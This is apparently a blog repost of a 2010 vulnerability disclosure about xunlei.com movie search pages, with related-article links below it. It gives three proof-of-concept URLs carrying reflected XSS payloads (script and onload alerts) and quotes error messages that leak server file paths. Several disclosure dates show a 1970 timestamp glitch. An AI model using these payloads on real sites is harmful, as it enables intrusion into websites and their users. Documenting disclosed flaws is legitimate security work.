迅雷的xss漏洞和敏感信息泄露

最新推荐文章于 2023-01-16 23:10:44 发布
最新推荐文章于 2023-01-16 23:10:44 发布
阅读量334 收藏
点赞数
文章标签: web安全 安全 hack 网络安全 wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124172471
版权

漏洞详情

披露状态:

2010-07-23: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-22: 细节向公众公开

简要描述:

几个xss漏洞和敏感信息泄露

详细说明:

几个xss,顺便爆出了服务器敏感信息
Warning: Invalid argument supplied for foreach() in /data/vhosts/xunlei.com/movie/public_html/movie_search_new.php on line 1309
Warning: Invalid argument supplied for foreach() in /data/vhosts/xunlei.com/movie/public_html/movie_search_new.php on line 1327

漏洞证明:

http://movies.xunlei.com/movie_search.php?type=xss%27;%22%3Cscript%3Ealert%28188%29%3C/script%3E&keyword=%D2%EC%D7%E5%D6%D5%BD%E1%D5%BD
http://movies.xunlei.com/movie_search.php?type=search&keyword=%3C/title%3E%3Cscript%3Ealert%28/anyunix/%29%3C/script%3E
http://movie.xunlei.com/type,area/a%22%3E%3CBODY%20ONLOAD=alert%28188%29%3E,1/

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
迅雷最新版本存在严重的远程拒绝服务漏洞(0day)
weixin_33905756的博客
04-24 165
转载的摘要:迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户.迅雷5的ThunderAgent_005.dll中注册了一个activex 控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃.From:[url]http://www.ph4nt0m.or...
xxs漏洞危害_浅谈XSS漏洞web中所造成的危害
weixin_31243809的博客
12-24 1139
2012-1-17 13:37 Tuesday浅谈XSS漏洞web中所造成的危害最近不知道为什么,可能是巧合吧,我接触到了不少关于XSS的东西,这其中也是阅读了一些的关于XSS的文章,由此一来,对XSS也有了一定的认识和思路,当然,这都是以站在巨人的肩膀上为基础的。在不少人看来,XSS可能造成的危害程度并不是很大,或者说,一个XSS漏洞的可利用价值并不高,一无非也就是弹框加收集cookie而已...
【惊爆】用迅雷的童鞋要注意了,不要泄露个人隐私,本人的最新发现
weixin_34307464的博客
10-06 1473
今天晚上正无聊的时候,突然发现桌面的网络邻居名字变成了迅雷邻居?纳闷!~打开看看吓了一大跳开始只是觉得有点吃惊,赶紧发了条微博 经过...
迅雷前CEO被立案侦查最新进展:窃取服务器数据怎么破?
云盒子企业云盘官方账号,17年专注文档安全
10-13 337
迅雷前CEO陈磊涉嫌非法侵占公司财务被立案侦查,这一事件闹得沸沸扬扬,从4月份被罢免职务到现在,相关非法行为被爆出,最新消息是:陈磊被免职当天前司机进入公司机房盗取数据未遂!这是怎么回事? 4月2号,也就是陈磊被免职的当天,他的司机姚某借机邀请了迅雷全资子公司网心科技的个别安保人员吃饭,在取得安保人员信任之后,借故以受领导之托去公司机房办事为由,利用安保人员的门禁卡进入网心公司机房,试图将5块1T的硬盘插入网心公司服务器,盗取公司数据和源码。 后因拷贝时间较长,到门口抽烟被发现后潜逃,这样的猪队友,
卧槽!迅雷的代码竟然被扒了精光!
Java和Android架构
03-30 427
上一篇:闲鱼面试官:Thread.sleep(0) 到底有什么用?我:有点懵~来源:juejin.im/post/6890344584078721031背景之前扒过飞书的源码,从代码设计架构层面里里外外学习一把,飞书还是挺 “大方” 的,源码在客户端和网页端都一览无余,不过好像新版本已经看不到了。相关的文章由于在内网技术论坛发过了不便于再发出来(泄露内部资料会被查水表的)...
JSP使用过滤器防止Xss漏洞
10-17
Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
XSS漏洞挖掘与安全防护.pdf
08-08
XSS(Cross Site Scripting,跨站脚本攻击)是一种常见...在本议题中,XSS漏洞的深入浅出介绍将围绕形成机制、攻击手段和防御策略等方面展开,强调开发过程中如何避免和减少XSS漏洞的风险,保障Web应用的安全稳定运行。
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
DedeCMS 存储型xss漏洞1
08-03
这个存储型 XSS 漏洞允许攻击者通过注入恶意脚本到 `des` 参数,从而在用户的浏览器上执行,获取用户的敏感信息,如 Cookie。该漏洞在DedeCMS V5.7 UTF8 SP2 版本中被发现,发布日期为2017年3月15日。当DedeCMS的...
Web迅雷(xunlei)0day漏洞曝光
weixin_30511107的博客
06-01 133
一、事件分析:   DSW Lab AVERT小组监测到一个高度危险讯雷漏洞被曝光,该漏洞发生在Web迅雷...
跨站脚本攻击漏洞XSS):基础知识和防御策略
最新发布
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础篇
XSS漏洞分类及危害
热门推荐
lay_loge的博客
05-22 3万+
常见的XSS漏洞分为存储型、反射型、DOM型三种。 (1)反射型XSS 用户在请求某条URL地址的时候,会携带一部分数据。当客户端进行访问某条链接时,攻击者可以将恶意代码植入到URL,如果服务端未对URL携带的参数做判断或者过滤处理,直接返回响应页面,那么XSS攻击代码就会一起被传输到用户的浏览器,从而触发反射型XSS。例如,当用户进行搜索时,返回结果通常会包括用户原始的搜索内容,如果攻击者精心构...
XSS漏洞总结之小试牛刀
MX的博客
06-20 1万+
一:XSS漏洞总结 1>:简介 XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2>: 分类及危害 XSS分类: 反射型: 非持久性XSS攻击,当用户访问已被插入攻击代码的链接时,攻击代码执行,完成该次攻击。 存
【应用安全xss二】xss攻击介绍和防范(前端)
qq_35789269的博客
04-07 3384
本文我们会讲解 XSS ,主要包括: XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确: XSS 防范是后端 RD(研发人员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符进行转义,才能进行下一步操作。 所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。 如果你还不能确定答案,那么可以带
XSS攻击常识及常见的XSS攻击脚本汇总
撸小鱼&奥术猫
04-12 4014
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 二、XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS 1、反射型XSS 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内...
XSS后台敏感操作(审计思路实现)
gl620321的博客
08-10 970
一、XSS后台敏感操作问题的审计 1、XSS是什么? XSS表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击中以以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,二在XSS攻击中,通过插入恶意脚本,实现对用户浏览器的控制。 2、XSS攻击可以分成两种类型 非持久性攻击:非持久性XSS攻击是一次性的,仅对当次的页面访问产生影响 持久性攻击:持久性XSS攻...
DOM型XSS漏洞测试payload大全
XSS漏洞 DOM型测试 ...同时,了解和应用OWASP(Open Web Application Security Project)的安全最佳实践,如输入验证、输出编码和内容安全策略(CSP),能够帮助开发者构建更安全Web应用,减少XSS漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值